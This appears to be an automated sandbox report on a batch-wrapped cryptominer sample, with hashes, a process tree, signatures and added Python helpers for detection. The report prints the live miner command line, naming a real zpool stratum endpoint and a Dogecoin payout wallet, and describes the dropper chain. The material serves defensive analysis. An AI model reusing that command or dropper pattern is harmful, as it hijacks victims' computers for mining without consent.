Analysis
max time kernel: 295s
max time network: 301s
platform: windows10-2004_x64
resource: win10v2004-20231215-ja
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-ja, locale:ja-jp, os:windows10-2004-x64, system:windows
submitted: 13-02-2024 06:37
Behavioral task behavioral1: sample batexe.exe, resource win10-20231215-ja
Behavioral task behavioral2: sample batexe.exe, resource win10v2004-20231215-ja
General
Target: batexe.exe
Size: 9.4MB
MD5: cdc9eacffc6d2bf43153815043064427
SHA1: d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256: 73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512: fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP: 196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence.
  description         ioc                                                                                                     process
  Key value queried   \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation     batexe.exe
  Key value queried   \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation     b2e.exe
The value read is the per-user GeoID (HKCU\Control Panel\International\Geo\Nation). The report records only the read, not what the sample compares the value against, so "geofence" is inferred from the access pattern rather than observed. For detection engineering note that Sysmon logs registry key and value creation, deletion, modification and renames (Event IDs 12 to 14) but not value reads, so this behaviour is invisible in Sysmon telemetry and needs an EDR or the ETW registry provider to catch.
Executes dropped EXE (2 IoCs)
  pid    process
  2444   b2e.exe
  1500   cpuminer-sse2.exe

Loads dropped DLL (5 IoCs)
  pid    process
  1500   cpuminer-sse2.exe   (five dropped-DLL loads, all by this process; the DLL paths are not listed in the report)

YARA rule match
  resource    behavioral2/memory/3376-7-0x0000000000400000-0x000000000393A000-memory.dmp
  yara_rule   upx
The match is on the memory dump of PID 3376 (batexe.exe), a region starting at the usual 0x400000 image base and spanning roughly 53 MB, against a 9.4 MB file on disk. That is consistent with a UPX-packed image: static scanning of the file sees the stub, and the unpacked content is only present once the stub has run in memory.
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Suspicious use of WriteProcessMemory (8 IoCs)
  description                          pid    process      procid_target   rows
  PID 3376 wrote to memory of 2444     3376   batexe.exe   84              3
  PID 2444 wrote to memory of 4716     2444   b2e.exe      85              3
  PID 4716 wrote to memory of 1500     4716   cmd.exe      88              2
Each edge is a parent writing into the child it has just created, which CreateProcess does legitimately to populate the new process's startup data, so the signature is weak on its own. What makes it useful here is that the writes trace the complete launch chain batexe.exe -> b2e.exe -> cmd.exe -> cpuminer-sse2.exe. The procid_target column appears to be the sandbox's own index of the target process rather than a Windows PID.
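An added example, not part of the sandbox report: it rebuilds the launch chain from rows in exactly the wording used above, collapsing repeated rows into one edge with a write count. It assumes that row format; a PID that only ever appears as a write target (1500) never names itself, so its image is supplied from the Processes section.

```python
import re
from collections import Counter, defaultdict

# Constructed input: the eight WriteProcessMemory rows from this report, one per
# line, in the sandbox's "PID <src> wrote to memory of <dst> <src> <image> <idx>" wording.
WPM_ROWS = """\
PID 3376 wrote to memory of 2444 3376 batexe.exe 84
PID 3376 wrote to memory of 2444 3376 batexe.exe 84
PID 3376 wrote to memory of 2444 3376 batexe.exe 84
PID 2444 wrote to memory of 4716 2444 b2e.exe 85
PID 2444 wrote to memory of 4716 2444 b2e.exe 85
PID 2444 wrote to memory of 4716 2444 b2e.exe 85
PID 4716 wrote to memory of 1500 4716 cmd.exe 88
PID 4716 wrote to memory of 1500 4716 cmd.exe 88
"""

# PIDs that only appear as targets never name themselves; taken from the
# Processes section of the report.
KNOWN_IMAGES = {1500: "cpuminer-sse2.exe"}

ROW_RE = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) (?P=src) (?P<image>\S+) (?P<idx>\d+)$"
)


def parse_rows(text):
    """Parse rows into (src_pid, dst_pid, src_image) tuples; lines that don't match are skipped."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            events.append((int(m["src"]), int(m["dst"]), m["image"]))
    return events


def build_tree(events, known_images=None):
    """Collapse repeated rows into edges: returns (children, writes_per_edge, pid_to_image)."""
    children = defaultdict(list)
    writes = Counter()
    images = dict(known_images or {})
    for src, dst, image in events:
        images[src] = image
        writes[(src, dst)] += 1
        if dst not in children[src]:
            children[src].append(dst)
    return children, writes, images


def lineage(children, pid):
    """Root-to-pid writer chain, e.g. [3376, 2444, 4716, 1500] for the miner."""
    parent = {c: p for p, cs in children.items() for c in cs}
    chain = [pid]
    while chain[0] in parent:
        chain.insert(0, parent[chain[0]])
    return chain


def render(children, writes, images):
    """Indented tree, one line per process, rooted at PIDs nobody wrote into."""
    targets = {c for cs in children.values() for c in cs}
    lines = []

    def walk(pid, depth, note=""):
        lines.append("  " * depth + f"{pid} {images.get(pid, '?')}{note}")
        for child in children.get(pid, []):
            walk(child, depth + 1, f"  [{writes[(pid, child)]} write(s) from {pid}]")

    for root in [p for p in children if p not in targets]:
        walk(root, 0)
    return lines


if __name__ == "__main__":
    ch, wr, im = build_tree(parse_rows(WPM_ROWS), KNOWN_IMAGES)
    print("\n".join(render(ch, wr, im)))
    print("miner lineage:", " -> ".join(map(str, lineage(ch, 1500))))
```

The same edge list works for Sysmon Event ID 10 (ProcessAccess) or EDR cross-process write events once they are mapped onto (source pid, target pid, source image) tuples; the lineage() result is what a rule should key on, not the raw count of writes.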
Processes
1  C:\Users\Admin\AppData\Local\Temp\batexe.exe
   command line: "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   PID: 3376
   2  C:\Users\Admin\AppData\Local\Temp\5CA7.tmp\b2e.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\5CA7.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5CA7.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID: 2444
      3  C:\Windows\SysWOW64\cmd.exe
         command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\614A.tmp\batchfile.bat" "
         - Suspicious use of WriteProcessMemory
         PID: 4716
         4  C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
            command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
            - Executes dropped EXE
            - Loads dropped DLL
            PID: 1500

What the chain shows: batexe.exe unpacks a b2e.exe stub and a batchfile.bat into %TEMP%\<hex>.tmp directories and runs the stub with the original executable's path as an argument. That layout is the one produced by Bat To Exe Converter, so the sample is a batch script wrapped in an executable rather than hand-written native code. The stub is a 32-bit binary: its child is recorded as C:\Windows\SysWOW64\cmd.exe although the command line names C:\Windows\system32\cmd.exe, which is WoW64 file-system redirection mapping system32 to SysWOW64 for 32-bit callers. The batch file then starts cpuminer-sse2.exe with the yespower algorithm against the zpool stratum endpoint yespower.sea.mine.zpool.ca:6234. In zpool's convention the user name is the payout address (DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ) and the password c=doge selects Dogecoin as the payout coin; -t 3 caps the miner at three threads. The pool host, port, the stratum+tcp scheme and the wallet address are the indicators to block and hunt for, and a process-creation rule on a command line containing "stratum+tcp://" or "-a yespower" catches this family regardless of the miner's file name.
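An added example, not part of the sandbox report, of the command-line check described above: it extracts algorithm, pool host and port, wallet, pool password and thread count from the cpuminer line in the tree, and generalises to the -u/-p and --name=value spellings that xmrig and other cpuminer forks use. The second sample line, its path and wallet value are hypothetical and not from the report.

```python
from urllib.parse import urlsplit

# Constructed input: the cpuminer-sse2.exe line from the process tree above, plus a
# hypothetical xmrig-style line (not from the report) to show the generalisation.
SAMPLE_CMDLINES = [
    "cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 "
    "--userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3",
    '"C:\\ProgramData\\svc\\x.exe" --url=stratum+ssl://pool.example.invalid:443 '
    "-u HYPOTHETICAL_WALLET -p x --threads 8",
]

# Short and long spellings shared by cpuminer forks and xmrig for the fields we want.
OPTION_NAMES = {
    "-a": "algo", "--algo": "algo",
    "-o": "url", "--url": "url",
    "-u": "user", "--user": "user",
    "-p": "pass", "--pass": "pass",
    "-O": "userpass", "--userpass": "userpass",
    "-t": "threads", "--threads": "threads",
}
# Flags that take no value, so the token after them must not be swallowed.
VALUELESS = {"-q", "--quiet", "-B", "--background", "-D", "--debug", "--no-color"}


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted runs as one token."""
    tokens, cur, quoted = [], "", False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append(cur)
            cur = ""
        else:
            cur += ch
    if cur:
        tokens.append(cur)
    return tokens


def parse_miner_cmdline(cmdline):
    """Return algo / pool / wallet / password / threads for a miner command line, or None
    when there is no stratum URL (the one field every pool miner must carry)."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    opts = {}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--") and "=" in tok:            # --name=value
            name, val = tok.split("=", 1)
            i += 1
        elif tok in VALUELESS:
            i += 1
            continue
        elif tok in OPTION_NAMES and i + 1 < len(tokens):  # -n value / --name value
            name, val = tok, tokens[i + 1]
            i += 2
        else:
            i += 1
            continue
        key = OPTION_NAMES.get(name)
        if key:
            opts[key] = val
    url = opts.get("url", "")
    if not url.startswith("stratum"):
        return None
    parts = urlsplit(url)
    wallet, password = opts.get("user"), opts.get("pass")
    if "userpass" in opts:                                   # cpuminer -O wallet:password
        wallet, _, password = opts["userpass"].partition(":")
    threads = opts.get("threads", "")
    return {
        "image": tokens[0].rsplit("\\", 1)[-1],
        "algo": opts.get("algo"),
        "scheme": parts.scheme,
        "pool_host": parts.hostname,
        "pool_port": parts.port,
        "wallet": wallet,
        "pool_password": password,
        "threads": int(threads) if threads.isdigit() else None,
    }


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(parse_miner_cmdline(line))
```

Feed it the CommandLine field of Sysmon Event ID 1 or the equivalent EDR process-creation record. The result keyed on pool_host and wallet is what to pivot on across hosts, since the miner binary name and the dropper wrapper change far more often than the payout address does.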
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 4.1MB
MD5: 1cb0fafeab20bf5e45ed4c595119913e
SHA1: 6a509917a703a8c8819c35df71cd19726cb0685f
SHA256: 790098b763279c6ad9dc1eac1bb7b22e6fa57b6b217561c5400861ae5400f78a
SHA512: cf72df020926a57d3be0e2b0c9d90c5407e4313aa0a55c2fc4d67b72b4603a01da9d912852ee3ca8468ddc311da4bdfe3f23150a9e85b8b34f9718530ccb9b4c
-
Filesize: 4.3MB
MD5: 3582cefb5f23f96942d0ffd6425d3f23
SHA1: ddd6d6c35986cb1ca84a6fe51eeb3cc764b21ffa
SHA256: 3521d0f61cf86290f4d5796b51d80957e56f33c8bf8a86c5f4c6f5ff745bac73
SHA512: 2ddb5c1813d5b93c64f00974468bc137c5236ac9604ecbee24e55b6c5b06e782cc5635efc61eee3a5b6290c026c4bb64df2c25d47af494181480580a5e1e62f2
-
Filesize: 3.2MB
MD5: 7e1a9b43d578de1da1ab8437fe674c34
SHA1: f0acbdff80cf90bbff4fcb30e9ba0324a528dd54
SHA256: 9366719e6a58bc512dfaf408276db4ae5b0bcccab5b48cdfad07015bd0b54e6c
SHA512: a3f1d0b300d91f1a1767802afe3ffb74ad2c295453725660540e6d20635517480b07b10cfe3d7c9e320d1e32074918ee8500a8d19333e4e64c70272818db27ef
-
Filesize: 136B
MD5: 8ea7ac72a10251ecfb42ef4a88bd330a
SHA1: c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA256: 65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512: a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize: 773KB
MD5: e54a6d5b9800b833e82b5a3ec9ef820f
SHA1: 866f29795aebe509e7cbfebaee552123c91a207a
SHA256: b5800aa93f82d5a809be93ddaf0cd6a9d6a4641cfe9b98f1c2de9df8c0eb8ace
SHA512: 7bba3c0d8ba8c4cf0961ee3f4d931dd730832677a90dae4bf2184ffa8b70113851fc52dd5e394f0ba6b64d5f3c63d62b8db432da9a2e310f72f559f42fa21081
-
Filesize: 916KB
MD5: 25f925ae801154d6c05c5730c5c77217
SHA1: bfde927ae66875f4aa790c4ccb9329917f919159
SHA256: 95931d8056fb05cbb38218b7a6d122590409042c3ba6054877c1c73fe6473129
SHA512: 9af1f1ca1ab98c8824344551cb712071501f06b5a5b7a4fadab6be2e10c67e618a64a9c791c682bf521624f67bea43d48945630414e444f7e75850a82dcdfb22
-
Filesize: 512KB
MD5: a5993c0dd7587f1716037dcfe1f63091
SHA1: 9a4d23ce36f5fc5791692b47d977c0bf92842879
SHA256: 568cec1e1bdccf401232a78c8ecf2081fdaea221f0a7c777a69ec61307cca3e3
SHA512: c5457590162dc1a0fd6b179ba94f19e6265e2ca226ea1ec553358f568690bbc158335ee92c297ce699b2928d44702733269f82640d86bb499c1981a5903afc12
-
Filesize: 658KB
MD5: 6ed2fd9ae1d7e61b654055657cb97c5b
SHA1: dfe90feeb8648109003fea612ab4b68f3525aedb
SHA256: 351ae18dd5943b3ead13795efbff9ff113b4e6eeea0bb1708037790c3522846d
SHA512: 114c79d8c32b55b3ca1c591993d35d8ef2b074ef38693a40ef5bd95aa2de9676f8f3a28b8a57bc0fb0fecb61f295b4d834230cdabc798b982bc2bc0cf0febfc0
-
Filesize: 1.1MB
MD5: 60b25308ef0249bbd3dc61c08bb2c3ef
SHA1: 7d11f7700e27e83c474f736d5d82ba463cc8f559
SHA256: b89f3993535add1423e70d1bba98c54c977c2bb4e95319c834716a19a908bec8
SHA512: 25d44faabf9a911113221b116467bac85b2abbc65cc8555c62830829f8f5d142ff3e9aa10a73f68c476fb94aa5d76d057cd722071aa5f182523a8a9ca27e5bb9
-
Filesize: 1.0MB
MD5: 859ea09a1969db4c5ecb8a73dd637b71
SHA1: 77a39b53a61f6c21a68469d92f91995fda07d968
SHA256: f8c79db5d6e98df00e22a1d546488168bdb0f8c076a8daa131b48c35706b3806
SHA512: 213b3b2b5f326eb89669c9a537e897bc54e388c7800d396d0ac89fc7728ec8b7dc9eb26c266700f69d9faae2905483466016e7dd0ed7a49ce19832973ad00faa
-
Filesize: 1.0MB
MD5: 2e986b7735be6b42f51a8ebced02a146
SHA1: 4f60231a36b79f83de5cdb55ad1f4aaebf76fc8d
SHA256: 403de2701b23c9015861a331fc5b2d2172c8717d0051e47b07086c317a751fe1
SHA512: 251dd976e74425996cb0cc50da35bba697d8ddde075f6494994e921c31f7bfce6c7ff33a6d9c8d462047d4a703971e2f5af37918d8496ae2c7c6a4459b8a7597
-
Filesize: 816KB
MD5: e21b6fac6cf4f43740e829438b3fc264
SHA1: 45fc5cd1a422e33ee92ba448e0bbee55f2e079cd
SHA256: b84f07d61cd1ea1f25ee256b70ca8f2db97ca7726457a3a7f61bbc790e1145b8
SHA512: 50c3696ad6f3dc500ef2f7705a3fb10aaeb85891985f146a26787c539fa9de30c7e8b8a74fc079088501f05adcba258cf7dd02618b1df48a05ad72b38ab7234d
-
Filesize: 747KB
MD5: 1c876d00f7880089c2c3292b3d5a1af0
SHA1: af4e09d1309d7a46f64c48910e19b5b65db66a37
SHA256: d3a8c4252e4d5defef1a2c137bf7142079ffb142b2a942597dd2d2088c58c9d1
SHA512: b2770a28a538ee3810af54319f1fb416ba6b9aff8ad9c1fb81b799794216badc53aa262a199103b634598c9e66fb04882a73b96c3fcc5820945b70af6a029a11
-
Filesize: 606KB
MD5: 585efec1bc1d4d916a4402c9875dff75
SHA1: d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA256: 2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512: b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize: 589KB
MD5: 6ff5afc8925aa3c831b95ad907152520
SHA1: d08d17819269c48d26fc0788bf81aabffbca3a3c
SHA256: b420d84443dabd6ecf596759ccdd26273a7a55e4a333b34f2059dd93f040332e
SHA512: e17ad68795020302afff18a6617299f7e9291cbaeb44864a1512a59dc0a6b4c71a1237fef850060a89f7f3107e91bb1b60cfa8ddc592cc615f3eff16f6d7ce67